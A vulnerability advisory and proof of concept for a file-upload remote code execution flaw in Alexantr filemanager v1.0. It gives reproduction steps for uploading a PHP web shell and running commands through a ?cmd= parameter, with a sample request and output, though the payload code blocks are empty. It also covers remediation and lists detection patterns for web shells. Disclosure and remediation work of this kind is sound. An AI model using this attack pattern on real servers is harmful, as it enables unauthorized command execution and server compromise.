## https://sploitus.com/exploit?id=4DD86603-D3C8-5F61-819D-AD2118ED5869
# CVE-2026-37637
Proof of Concept for **CVE-2026-37637** - Remote Code Execution in **Alexantr filemanager v1.0** via unrestricted file upload in `filemanager.php`.
## Overview
**CVE-2026-37637** is a Remote Code Execution vulnerability affecting **Alexantr filemanager v1.0**.
The vulnerability exists in the `filemanager.php` component due to insufficient validation of uploaded files. A remote attacker can upload a malicious PHP file into a web-accessible directory and execute arbitrary commands on the server.
> CVE status: Submitted to MITRE
> Researcher: CYBER-SEC
> Vendor repository: https://github.com/alexantr/filemanager
---
## Vulnerability Summary
| Item | Description |
|---|---|
| CVE ID | CVE-2026-37637 |
| Vulnerability Type | Remote Code Execution |
| Affected Product | Alexantr filemanager |
| Affected Version | v1.0 |
| Vulnerable Component | `filemanager.php` |
| Attack Vector | Remote |
| Authentication Required | Depends on deployment/configuration |
| Impact | Arbitrary command execution |
| Root Cause | Unrestricted file upload and lack of server-side file validation |
---
## Impact
An attacker can upload a malicious PHP file through the file upload functionality. Because uploaded files are stored in a web-accessible location and PHP execution is allowed, the attacker can execute arbitrary system commands on the server.
Successful exploitation may allow an attacker to:
- Execute arbitrary commands on the server
- Read sensitive files
- Modify or delete application files
- Upload additional malware or web shells
- Pivot further into the hosting environment
- Fully compromise the affected server
---
## Technical Details
The application allows users to upload arbitrary files without properly validating the file extension, MIME type, or file content.
A malicious PHP file such as the following can be uploaded:
```php
```
Once uploaded into a web-accessible directory, the attacker can execute commands by accessing the file through the browser and passing commands through the `cmd` parameter.
Example:
```text
http://target/uploads/shell.php?cmd=id
```
This results in command execution on the underlying operating system.
---
## Steps to Reproduce
### 1. Clone the vulnerable application
```bash
git clone https://github.com/alexantr/filemanager
cd filemanager
```
### 2. Start the PHP development server
```bash
php -S localhost:8000
```
### 3. Access the application
Open the application in a browser:
```text
http://localhost:8000/filemanager.php
```
Depending on the deployment or configuration, the application may also be accessible through:
```text
http://localhost:8000/pheditor.php
```
### 4. Upload a malicious PHP file
Create a file named `shell.php`:
```php
```
Upload the file using the application’s upload functionality.
### 5. Execute a command
After uploading the file, access it directly from the browser:
```text
http://localhost:8000/uploads/shell.php?cmd=id
```
If the exploit is successful, the server will execute the command and return the output.
Example output:
```text
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
---
## Proof of Concept
### Malicious PHP Payload
```php
```
### Example Request
```http
GET /uploads/shell.php?cmd=id HTTP/1.1
Host: target
User-Agent: Mozilla/5.0
Connection: close
```
### Expected Result
The command supplied through the `cmd` parameter is executed on the server.
---
## Root Cause
The vulnerability is caused by insufficient server-side validation in the file upload functionality.
The application does not properly restrict:
- File extensions
- MIME types
- File content
- Upload destination
- Execution permissions inside the upload directory
As a result, executable PHP files can be uploaded and executed directly.
---
## Recommended Remediation
The vendor and users should implement the following protections.
### 1. Block Dangerous File Extensions
Disallow upload of executable file types such as:
```text
.php, .phtml, .php3, .php4, .php5, .phar
```
### 2. Use an Allowlist
Only allow expected file types, for example:
```text
.jpg, .png, .gif, .txt, .pdf
```
### 3. Validate MIME Type and File Content
Do not rely only on the client-provided `Content-Type` header.
File validation should be performed server-side.
### 4. Store Uploaded Files Outside the Web Root
Uploaded files should not be directly executable or publicly accessible.
### 5. Disable PHP Execution in Upload Directories
For Apache, this can be done with `.htaccess`:
```apache
php_flag engine off
RemoveHandler .php .phtml .php3 .php4 .php5 .phar
RemoveType .php .phtml .php3 .php4 .php5 .phar
```
For Nginx, prevent PHP handling in upload paths:
```nginx
location /uploads/ {
location ~ \.php$ {
deny all;
}
}
```
### 6. Rename Uploaded Files
Use random server-generated filenames and remove user-controlled extensions.
### 7. Apply Proper Access Control
Restrict upload functionality to trusted users only.
---
## Detection
Administrators can look for suspicious uploaded PHP files in web-accessible directories.
Example indicators:
```text
shell.php
cmd.php
upload.php
backdoor.php
.php files inside upload directories
```
Suspicious request patterns may include:
```text
?cmd=
?exec=
?shell=
?command=
```
Example log entry:
```text
GET /uploads/shell.php?cmd=id HTTP/1.1
```
---
## Disclaimer
This repository is provided for educational and defensive security purposes only.
The information and proof of concept are intended to help developers, system administrators, and security professionals understand and remediate the vulnerability.
Do not use this information to attack systems without explicit authorization. Unauthorized access to computer systems is illegal.
The author is not responsible for any misuse of the information provided in this repository.
---
## References
- https://github.com/alexantr/filemanager
- https://cve.mitre.org/